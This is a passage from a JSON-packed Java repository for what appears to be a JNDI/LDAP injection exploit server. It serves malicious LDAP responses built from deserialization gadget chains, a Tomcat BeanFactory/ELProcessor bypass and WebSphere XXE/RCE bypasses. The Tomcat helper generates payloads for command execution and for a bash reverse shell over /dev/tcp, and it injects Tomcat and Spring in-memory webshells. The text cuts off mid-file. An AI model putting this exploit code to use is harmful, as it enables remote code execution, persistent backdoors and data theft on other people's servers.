"content": "package com.feihong.ldap.controllers;\n\nimport com.feihong.ldap.exceptions.IncorrectParamsException;\nimport com.feihong.ldap.exceptions.UnSupportedActionTypeException;\nimport com.feihong.ldap.exceptions.UnSupportedGadgetTypeException;\nimport com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\n\npublic interface LdapController {\n void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception;\n void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException, UnSupportedActionTypeException;\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/LdapMapping.java",
"content": "package com.feihong.ldap.controllers;\n\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\nimport java.lang.annotation.RetentionPolicy;\nimport java.lang.annotation.Target;\n\n@Retention(RetentionPolicy.RUNTIME)\n@Target(ElementType.TYPE)\npublic @interface LdapMapping {\n String[] uri();\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/PropertiesRefAddr.java",
"content": "package com.ibm.websphere.client.factory.jdbc;\n\nimport javax.naming.RefAddr;\nimport java.util.Properties;\n\n//this is a stub class required by WebSphere2 ldap handler\npublic class PropertiesRefAddr extends RefAddr {\n private static final long serialVersionUID = 288055886942232156L;\n private Properties props;\n\n public PropertiesRefAddr(String addrType, Properties props) {\n super(addrType);\n this.props = props;\n }\n\n public Object getContent() {\n return this.props;\n }\n}"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/SerializedDataController.java",
"content": "package com.feihong.ldap.controllers;\n\nimport com.feihong.ldap.enumtypes.GadgetType;\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.feihong.ldap.exceptions.IncorrectParamsException;\nimport com.feihong.ldap.exceptions.UnSupportedGadgetTypeException;\nimport com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;\nimport com.feihong.ldap.utils.*;\nimport com.feihong.ldap.gadgets.*;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\nimport com.unboundid.ldap.sdk.Entry;\nimport com.unboundid.ldap.sdk.LDAPResult;\nimport com.unboundid.ldap.sdk.ResultCode;\n\n@LdapMapping(uri = { \"/deserialize\" })\npublic class SerializedDataController implements LdapController {\n private GadgetType gadgetType;\n private PayloadType payloadType;\n private String[] params;\n\n @Override\n public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {\n System.out.println(\"[+] Send LDAP result for \" + base + \" with javaSerializedData attribute\");\n\n //这个方法里面有改动,其他基本无改动\n Entry e = new Entry(base);\n byte[] bytes = null;\n switch (gadgetType){\n case urldns:\n bytes = URLDNS.getBytes(params[0]);\n break;\n case commonsbeanutils1:\n bytes = CommonsBeanutils1.getBytes(payloadType, params);\n break;\n case commonscollections1:\n bytes = CommonsCollections1.getBytes(payloadType, params);\n break;\n case commonscollections2:\n bytes = CommonsCollections2.getBytes(payloadType, params);\n break;\n case jre8u20:\n bytes = Jre8u20.getBytes(payloadType, params);\n break;\n case c3p0:\n bytes = C3P0.getBytes(payloadType, params);\n break;\n }\n\n e.addAttribute(\"javaClassName\", \"foo\");\n e.addAttribute(\"javaSerializedData\",bytes);\n result.sendSearchEntry(e);\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\n }\n\n @Override\n public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException {\n try{\n int firstIndex = base.indexOf(\"/\");\n int secondIndex = base.indexOf(\"/\", firstIndex + 1);\n try{\n gadgetType = GadgetType.valueOf(base.substring(firstIndex + 1, secondIndex).toLowerCase());\n System.out.println(\"[+] GaddgetType: \" + gadgetType);\n }catch(IllegalArgumentException e){\n throw new UnSupportedGadgetTypeException(\"UnSupportGaddgetType: \" + base.substring(firstIndex + 1, secondIndex));\n }\n\n if(gadgetType == GadgetType.urldns){\n String url = \"http://\" + base.substring(base.lastIndexOf(\"/\") + 1);\n System.out.println(\"[+] URL: \" + url);\n params = new String[]{url};\n return;\n }\n\n int thirdIndex = base.indexOf(\"/\", secondIndex + 1);\n if(thirdIndex < 0) thirdIndex = base.length();\n try{\n payloadType = PayloadType.valueOf(base.substring(secondIndex + 1, thirdIndex).toLowerCase());\n System.out.println(\"[+] PayloadType: \" + payloadType);\n }catch (IllegalArgumentException e){\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + base.substring(secondIndex + 1, thirdIndex));\n }\n\n switch(payloadType){\n case dnslog:\n String url = base.substring(base.lastIndexOf(\"/\") + 1);\n System.out.println(\"[+] URL: \" + url);\n params = new String[]{url};\n break;\n case command:\n String cmd = Util.getCmdFromBase(base);\n System.out.println(\"[+] Command: \" + cmd);\n params = new String[]{cmd};\n break;\n case reverseshell:\n String[] results = Util.getIPAndPortFromBase(base);\n System.out.println(\"[+] IP: \" + results[0]);\n System.out.println(\"[+] Port: \" + results[1]);\n params = results;\n break;\n }\n\n }catch(Exception e){\n if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e;\n if(e instanceof UnSupportedGadgetTypeException) throw (UnSupportedGadgetTypeException)e;\n\n throw new IncorrectParamsException(\"Incorrect params: \" + base);\n }\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/TomcatBypassController.java",
"content": "package com.feihong.ldap.controllers;\n\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.feihong.ldap.exceptions.IncorrectParamsException;\nimport com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;\nimport com.feihong.ldap.utils.*;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\nimport com.unboundid.ldap.sdk.Entry;\nimport com.unboundid.ldap.sdk.LDAPResult;\nimport com.unboundid.ldap.sdk.ResultCode;\nimport org.apache.naming.ResourceRef;\nimport javax.naming.StringRefAddr;\nimport java.io.IOException;\n\n/*\n 注意:在 Javascript 引擎时,直接使用 sun.misc.Base64Decoder 和 org.apache.tomcat.util.buf.Base64 均会抛出异常\n\n * Requires:\n * - Tomcat 8+ or SpringBoot 1.2.x+ in classpath\n */\n\n@LdapMapping(uri = { \"/tomcatbypass\" })\npublic class TomcatBypassController implements LdapController {\n private PayloadType type;\n private String[] params;\n private String payloadTemplate = \"{\" +\n \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\")\" +\n \".newInstance().getEngineByName(\\\"JavaScript\\\")\" +\n \".eval(\\\"{replacement}\\\")\" +\n \"}\";\n\n\n @Override\n public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {\n System.out.println(\"[+] Sending LDAP ResourceRef result for \" + base + \" with javax.el.ELProcessor payload\");\n\n Entry e = new Entry(base);\n e.addAttribute(\"javaClassName\", \"java.lang.String\"); //could be any\n //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory\n ResourceRef ref = new ResourceRef(\"javax.el.ELProcessor\", null, \"\", \"\",\n true, \"org.apache.naming.factory.BeanFactory\", null);\n ref.add(new StringRefAddr(\"forceString\", \"x=eval\"));\n\n TomcatBypassHelper helper = new TomcatBypassHelper();\n String code = null;\n switch (type){\n case dnslog:\n code = helper.getDnsRequestCode(params[0]);\n break;\n case command:\n code = helper.getExecCode(params[0]);\n break;\n case reverseshell:\n code = helper.getReverseShellCode(params[0], params[1]);\n break;\n case tomcatmemshell:\n code = helper.injectTomcatMemsell();\n break;\n case springmemshell:\n code = helper.injectSpringMemshell();\n break;\n }\n String finalPayload = payloadTemplate.replace(\"{replacement}\", code);\n System.out.println(\"[+] Return script:\");\n System.out.println(\"-----------------------------------------------\");\n System.out.println(finalPayload);\n System.out.println(\"-----------------------------------------------\");\n ref.add(new StringRefAddr(\"x\", finalPayload));\n e.addAttribute(\"javaSerializedData\", Util.serialize(ref));\n\n result.sendSearchEntry(e);\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\n }\n\n @Override\n public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException {\n try{\n int firstIndex = base.indexOf(\"/\");\n int secondIndex = base.indexOf(\"/\", firstIndex + 1);\n if(secondIndex < 0) secondIndex = base.length();\n\n try{\n type = PayloadType.valueOf(base.substring(firstIndex + 1, secondIndex).toLowerCase());\n\n //因为是 Tomcat Bypass,所以仅需要支持 Tomcat内存shell 和 Spring内存shell 即可\n if(type == PayloadType.weblogicmemshell || type == PayloadType.webspherememshell\n || type == PayloadType.jettymemshell || type == PayloadType.jbossmemshell){\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + type);\n }\n\n System.out.println(\"[+] Paylaod: \" + type);\n }catch(IllegalArgumentException e){\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + base.substring(firstIndex + 1, secondIndex));\n }\n\n switch (type){\n case dnslog:\n String url = base.substring(base.lastIndexOf(\"/\") + 1);\n System.out.println(\"[+] URL: \" + url);\n params = new String[]{url};\n break;\n case command:\n String cmd = Util.getCmdFromBase(base);\n System.out.println(\"[+] Command: \" + cmd);\n params = new String[]{cmd};\n break;\n case reverseshell:\n String[] results = Util.getIPAndPortFromBase(base);\n System.out.println(\"[+] IP: \" + results[0]);\n System.out.println(\"[+] Port: \" + results[1]);\n params = results;\n break;\n }\n }catch(Exception e){\n if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e;\n\n throw new IncorrectParamsException(\"Incorrect params: \" + base);\n }\n }\n\n private class TomcatBypassHelper{\n /*\n 在对代码进行改写时需要注意:\n ① 所有的数据类型修改为 var, 包括 byte[] bytes ( var bytes )\n ② 必须使用全类名\n ③ System.out.println() 需要修改为 print()\n ④ try{...}catch(Exception e){...} 需要修改为 try{...}catch(err){...}\n ⑤ 双引号改为单引号\n ⑥ Class.forName() 需要改为 java.lang.Class.forName(), String 需要改为 java.lang.String等\n ⑦ 去除类型强转\n ⑧ 不能用 sun.misc.Base64Encoder,会抛异常 javax.script.ScriptException: ReferenceError: \"sun\" is not defined in at line number 1\n ⑨ 不能使用 for(Object obj : objects) 循环\n */\n\n public String getExecCode(String cmd) throws IOException {\n\n String code = \"var strs=new Array(3);\\n\" +\n \" if(java.io.File.separator.equals('/')){\\n\" +\n \" strs[0]='/bin/bash';\\n\" +\n \" strs[1]='-c';\\n\" +\n \" strs[2]='\" + cmd + \"';\\n\" +\n \" }else{\\n\" +\n \" strs[0]='cmd';\\n\" +\n \" strs[1]='/C';\\n\" +\n \" strs[2]='\" + cmd + \"';\\n\" +\n \" }\\n\" +\n \" java.lang.Runtime.getRuntime().exec(strs);\";\n\n return code;\n }\n\n public String getDnsRequestCode(String dnslog){\n String code = \"var str;\\n\" +\n \" if(java.io.File.separator.equals('/')){\\n\" +\n \" str = 'ping -c 1 \" + dnslog + \"';\\n\" +\n \" }else{\\n\" +\n \" str = 'nslookup \" + dnslog + \"';\\n\" +\n \" }\\n\" +\n \"\\n\" +\n \" java.lang.Runtime.getRuntime().exec(str);\";\n\n return code;\n }\n\n public String getReverseShellCode(String ip, String port){\n int pt = Integer.parseInt(port);\n String code = \"if(java.io.File.separator.equals('/')){\\n\" +\n \" var cmds = new Array('/bin/bash', '-c', '/bin/bash -i >& /dev/tcp/\" + ip + \"/\" + pt + \"');\\n\" +\n \" java.lang.Runtime.getRuntime().exec(cmds);\\n\" +\n \" }\";\n\n return code;\n }\n\n public String injectTomcatMemsell(){\n return injectMemshell(\"com.feihong.ldap.template.TomcatMemshellTemplate\");\n }\n\n public String injectSpringMemshell(){\n return injectMemshell(\"com.feihong.ldap.template.SpringMemshellTemplate\");\n }\n\n public String injectMemshell(String className){\n //使用类加载的方式最为方便,可维护性也大大增强\n\n String classCode = null;\n try{\n classCode = Util.getClassCode(className);\n }catch(Exception e){\n e.printStackTrace();\n }\n\n //没法直接调用 sun.misc.Base64Decoder,会报错,索性用反射的方法写了\n String code = \"var bytes;\\n\" +\n \" str = '\" + classCode + \"';\\n\" +\n \" try{\\n\" +\n \" var clazz = java.lang.Class.forName('java.util.Base64');\\n\" +\n \" var method = clazz.getDeclaredMethod('getDecoder');\\n\" +\n \" var obj = method.invoke(null);\\n\" +\n \" method = obj.getClass().getDeclaredMethod('decode', java.lang.String.class);\\n\" +\n \" obj = method.invoke(obj, str);\\n\" +\n \" bytes = obj;\\n\" +\n \" }catch(err){\\n\" +\n \" var clazz = java.lang.Class.forName('sun.misc.BASE64Decoder');\\n\" +\n \" var method = clazz.getMethod('decodeBuffer', java.lang.String.class);\\n\" +\n \" var obj = method.invoke(clazz.newInstance(), str);\\n\" +\n \" bytes = obj;\\n\" +\n \" }\\n\" +\n \" \\n\" +\n \" var classLoader = java.lang.Thread.currentThread().getContextClassLoader();\\n\" +\n \" var method = null;\\n\" +\n \" var clz = classLoader.getClass();\\n\" +\n \" while(method == null && clz != java.lang.Object.class ){\\n\" +\n \" try{\\n\" +\n \" method = clz.getDeclaredMethod('defineClass', '123'.getBytes().getClass(), java.lang.Integer.TYPE, java.lang.Integer.TYPE);\\n\" +\n \" }catch(err){\\n\" +\n \" clz = clz.getSuperclass();\\n\" +\n \" }\\n\" +\n \" }\\n\" +\n \" method.setAccessible(true);\\n\" +\n \" var clazz = method.invoke(classLoader, bytes, 0, bytes.length);\\n\" +\n \" clazz.newInstance();\";\n\n return code;\n }\n }\n}"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/WebsphereBypassController.java",
"content": "package com.feihong.ldap.controllers;\n\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.feihong.ldap.enumtypes.WebsphereActionType;\nimport com.feihong.ldap.exceptions.IncorrectParamsException;\nimport com.feihong.ldap.exceptions.UnSupportedActionTypeException;\nimport com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;\nimport com.feihong.ldap.utils.*;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\nimport com.unboundid.ldap.sdk.Entry;\nimport com.unboundid.ldap.sdk.LDAPResult;\nimport com.unboundid.ldap.sdk.ResultCode;\nimport javax.naming.Reference;\nimport javax.naming.StringRefAddr;\nimport java.util.Properties;\n\n/*\n * Requires:\n * - websphere v6-9 libraries in the classpath\n */\n\n@LdapMapping(uri = { \"/webspherebypass\" })\npublic class WebsphereBypassController implements LdapController {\n private WebsphereActionType actionType;\n private String localJarPath;\n private String injectUrl;\n\n @Override\n public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {\n\n System.out.println(\"[+] Sending LDAP ResourceRef result for \" + base);\n\n Entry e = new Entry(base);\n e.addAttribute(\"javaClassName\", \"java.lang.String\"); //could be any\n\n if(actionType == WebsphereActionType.rce){\n //prepare a payload that leverages arbitrary local classloading in com.ibm.ws.client.applicationclient.ClientJMSFactory\n Reference ref = new Reference(\"ExportObject\",\n \"com.ibm.ws.client.applicationclient.ClientJ2CCFFactory\", null);\n Properties refProps = new Properties();\n refProps.put(\"com.ibm.ws.client.classpath\", localJarPath);\n refProps.put(\"com.ibm.ws.client.classname\", \"xExportObject\");\n// ref.add(new com.ibm.websphere.client.factory.jdbc.PropertiesRefAddrropertiesRefAddr(\"JMSProperties\", refProps));\n e.addAttribute(\"javaSerializedData\", Util.serialize(ref));\n\n }else{\n //prepare payload that exploits XXE in com.ibm.ws.webservices.engine.client.ServiceFactory\n javax.naming.Reference ref = new Reference(\"ExploitObject\",\n \"com.ibm.ws.webservices.engine.client.ServiceFactory\", null);\n ref.add(new StringRefAddr(\"WSDL location\", injectUrl));\n ref.add(new StringRefAddr(\"service namespace\",\"xxx\"));\n ref.add(new StringRefAddr(\"service local part\",\"yyy\"));\n e.addAttribute(\"javaSerializedData\", Util.serialize(ref));\n }\n\n result.sendSearchEntry(e);\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\n }\n\n @Override\n public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedActionTypeException {\n try{\n int firstIndex = base.indexOf(\"/\");\n int secondIndex = base.indexOf(\"/\", firstIndex + 1);\n if(secondIndex < 0) secondIndex = base.length();\n\n try{\n actionType = WebsphereActionType.valueOf(base.substring(firstIndex + 1, secondIndex).toLowerCase());\n System.out.println(\"[+] ActionType: \" + actionType);\n }catch(IllegalArgumentException e){\n throw new UnSupportedActionTypeException(\"UnSupportedActionType: \" + base.substring(firstIndex + 1, secondIndex));\n }\n\n switch(actionType){\n case list:\n String file = base.substring(base.lastIndexOf(\"=\") + 1);\n System.out.println(\"[+] Read File/List Directory: \" + file);\n injectUrl = \"http://\" + Config.ip + \":\" + Config.httpPort + \"/list.wsdl?file=\" + file;\n break;\n case rce:\n String localJarFile = base.substring(base.lastIndexOf(\"=\") + 1);\n System.out.println(\"[+] Local jar path: \" + localJarFile);\n localJarPath = localJarFile;\n break;\n case upload:\n int thirdIndex = base.indexOf(\"/\", secondIndex + 1);\n if(thirdIndex < 0) thirdIndex = base.length();\n\n PayloadType payloadType = null;\n try{\n payloadType = PayloadType.valueOf(base.substring(secondIndex + 1, thirdIndex).toLowerCase());\n // webspherebypass 只支持这 4 种类型的 PayloadType\n if(payloadType != PayloadType.command && payloadType != PayloadType.dnslog\n && payloadType != PayloadType.reverseshell && payloadType != PayloadType.webspherememshell){\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + payloadType);\n }\n }catch(IllegalArgumentException e){\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + base.substring(secondIndex + 1, thirdIndex));\n }\n\n System.out.println(\"[+] PayloadType: \" + payloadType);\n switch (payloadType){\n case command:\n String cmd = Util.getCmdFromBase(base);\n System.out.println(\"[+] Command: \" + cmd);\n injectUrl = \"http://\" + Config.ip + \":\" + Config.httpPort + \"/upload.wsdl?type=command&cmd=\" + cmd;\n break;\n case dnslog:\n String url = base.substring(base.lastIndexOf(\"/\") + 1);\n System.out.println(\"[+] URL: \" + url);\n injectUrl = \"http://\" + Config.ip + \":\" + Config.httpPort + \"/upload.wsdl?type=dnslog&url=\" + url;\n break;\n case reverseshell:\n String[] results = Util.getIPAndPortFromBase(base);\n System.out.println(\"[+] IP: \" + results[0]);\n System.out.println(\"[+] Port: \" + results[1]);\n injectUrl = \"http://\" + Config.ip + \":\" + Config.httpPort + \"/upload.wsdl?type=reverseshell&ip=\" + results[0] + \"&port=\" + results[1];\n break;\n case webspherememshell:\n injectUrl = \"http://\" + Config.ip + \":\" + Config.httpPort + \"/upload.wsdl?type=webspherememshell\";\n break;\n }\n break;\n }\n }catch(Exception e){\n if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e;\n if(e instanceof UnSupportedActionTypeException) throw (UnSupportedActionTypeException)e;\n\n throw new IncorrectParamsException(\"Incorrect params: \" + base);\n }\n }\n}"
},
{
"path": "src/main/java/com/feihong/ldap/enumtypes/GadgetType.java",
"content": "package com.feihong.ldap.enumtypes;\n\npublic enum GadgetType {\n urldns,\n commonsbeanutils1,\n commonscollections1,\n commonscollections2,\n jre8u20,\n c3p0;\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/enumtypes/MemShellType.java",
"content": "package com.feihong.ldap.enumtypes;\n\npublic final class MemShellType {\n\n private MemShellType(){};\n\n public static final String TOMCAT = \"com.feihong.ldap.template.TomcatMemshellTemplate\";\n public static final String JETTY = \"com.feihong.ldap.template.JettyMemshellTemplate\";\n public static final String WEBLOGIC = \"com.feihong.ldap.template.WeblogicMemshellTemplate\";\n public static final String JBOSS = \"com.feihong.ldap.template.JBossMemshellTemplate\";\n public static final String WEBSPHERE = \"com.feihong.ldap.template.WebsphereMemshellTemplate\";\n public static final String SPRING = \"com.feihong.ldap.template.SpringMemshellTemplate\";\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/enumtypes/PayloadType.java",
"content": "package com.feihong.ldap.enumtypes;\n\npublic enum PayloadType {\n command,\n dnslog,\n reverseshell,\n tomcatmemshell,\n weblogicmemshell,\n jettymemshell,\n jbossmemshell,\n webspherememshell,\n springmemshell;\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/enumtypes/WebsphereActionType.java",
"content": "package com.feihong.ldap.enumtypes;\n\npublic enum WebsphereActionType {\n list,\n upload,\n rce;\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/exceptions/IncorrectParamsException.java",
"content": "package com.feihong.ldap.exceptions;\n\npublic class IncorrectParamsException extends RuntimeException {\n public IncorrectParamsException(){\n super();\n }\n public IncorrectParamsException(String message){\n super(message);\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/exceptions/UnSupportedActionTypeException.java",
"content": "package com.feihong.ldap.exceptions;\n\npublic class UnSupportedActionTypeException extends RuntimeException{\n public UnSupportedActionTypeException(){\n super();\n }\n public UnSupportedActionTypeException(String message){\n super(message);\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/exceptions/UnSupportedGadgetTypeException.java",
"content": "package com.feihong.ldap.exceptions;\n\npublic class UnSupportedGadgetTypeException extends RuntimeException {\n public UnSupportedGadgetTypeException(){ super();}\n public UnSupportedGadgetTypeException(String message){\n super(message);\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/exceptions/UnSupportedPayloadTypeException.java",
"content": "package com.feihong.ldap.exceptions;\n\npublic class UnSupportedPayloadTypeException extends RuntimeException {\n public UnSupportedPayloadTypeException(){\n super();\n }\n public UnSupportedPayloadTypeException(String message){\n super(message);\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/gadgets/C3P0.java",
"content": "package com.feihong.ldap.gadgets;\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.ObjectOutputStream;\nimport java.io.PrintWriter;\nimport java.lang.reflect.Field;\nimport java.sql.SQLException;\nimport java.sql.SQLFeatureNotSupportedException;\nimport java.util.logging.Logger;\nimport javax.naming.NamingException;\nimport javax.naming.Reference;\nimport javax.naming.Referenceable;\nimport javax.sql.ConnectionPoolDataSource;\nimport javax.sql.PooledConnection;\nimport com.feihong.ldap.template.CommandTemplate;\nimport com.feihong.ldap.template.DnslogTemplate;\nimport com.feihong.ldap.template.ReverseShellTemplate;\nimport com.feihong.ldap.utils.Config;\nimport com.feihong.ldap.enumtypes.MemShellType;\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.mchange.v2.c3p0.PoolBackedDataSource;\nimport com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;\n\n\npublic class C3P0 {\n public static byte[] getBytes(PayloadType type, String... param) throws Exception {\n\n String className;\n switch (type){\n case command:\n CommandTemplate commandTemplate = new CommandTemplate(param[0]);\n commandTemplate.cache();\n className = commandTemplate.getClassName();\n break;\n case dnslog:\n DnslogTemplate dnslogTemplate = new DnslogTemplate(param[0]);\n dnslogTemplate.cache();\n className = dnslogTemplate.getClassName();\n break;\n case reverseshell:\n ReverseShellTemplate reverseShellTemplate = new ReverseShellTemplate(param[0], param[1]);\n reverseShellTemplate.cache();\n className = reverseShellTemplate.getClassName();\n break;\n case tomcatmemshell:\n className = MemShellType.TOMCAT;\n break;\n case jettymemshell:\n className = MemShellType.JETTY;\n break;\n case jbossmemshell:\n className = MemShellType.JBOSS;\n break;\n case weblogicmemshell:\n className = MemShellType.WEBLOGIC;\n break;\n case webspherememshell:\n className = MemShellType.WEBSPHERE;\n break;\n case springmemshell:\n className = MemShellType.SPRING;\n break;\n default:\n throw new IllegalStateException(\"Unexpected value: \" + type);\n }\n\n PoolBackedDataSource b = PoolBackedDataSource.class.newInstance();\n Field field = PoolBackedDataSourceBase.class.getDeclaredField(\"connectionPoolDataSource\");\n field.setAccessible(true);\n field.set(b, new PoolSource(className,\"http://\" + Config.ip + \":\" + Config.httpPort + \"/\"));\n\n //序列化\n ByteArrayOutputStream baous = new ByteArrayOutputStream();\n ObjectOutputStream oos = new ObjectOutputStream(baous);\n oos.writeObject(b);\n byte[] bytes = baous.toByteArray();\n oos.close();\n\n return bytes;\n }\n\n\n private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {\n\n private String className;\n private String url;\n\n public PoolSource ( String className, String url ) {\n this.className = className;\n this.url = url;\n }\n\n public Reference getReference () throws NamingException {\n return new Reference(\"exploit\", this.className, this.url);\n }\n\n public PrintWriter getLogWriter () throws SQLException {return null;}\n public void setLogWriter ( PrintWriter out ) throws SQLException {}\n public void setLoginTimeout ( int seconds ) throws SQLException {}\n public int getLoginTimeout () throws SQLException {return 0;}\n public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}\n public PooledConnection getPooledConnection () throws SQLException {return null;}\n public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/gadgets/CommonsBeanutils1.java",
"content": "package com.feihong.ldap.gadgets;\n\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.feihong.ldap.gadgets.utils.Gadgets;\nimport com.feihong.ldap.gadgets.utils.Reflections;\nimport org.apache.commons.beanutils.BeanComparator;\nimport java.io.ByteArrayOutputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectOutputStream;\nimport java.math.BigInteger;\nimport java.util.PriorityQueue;\n\npublic class CommonsBeanutils1 {\n public static void main(String[] args) throws Exception {\n byte[] bytes = getBytes(PayloadType.command, \"calc\");\n FileOutputStream fous = new FileOutputStream(\"333.ser\");\n fous.write(bytes);\n fous.close();\n }\n\n public static byte[] getBytes(PayloadType type, String... param) throws Exception {\n final Object templates = Gadgets.createTemplatesImpl(type, param);\n // mock method name until armed\n final BeanComparator comparator = new BeanComparator(\"lowestSetBit\");\n\n // create queue with numbers and basic comparator\n final PriorityQueue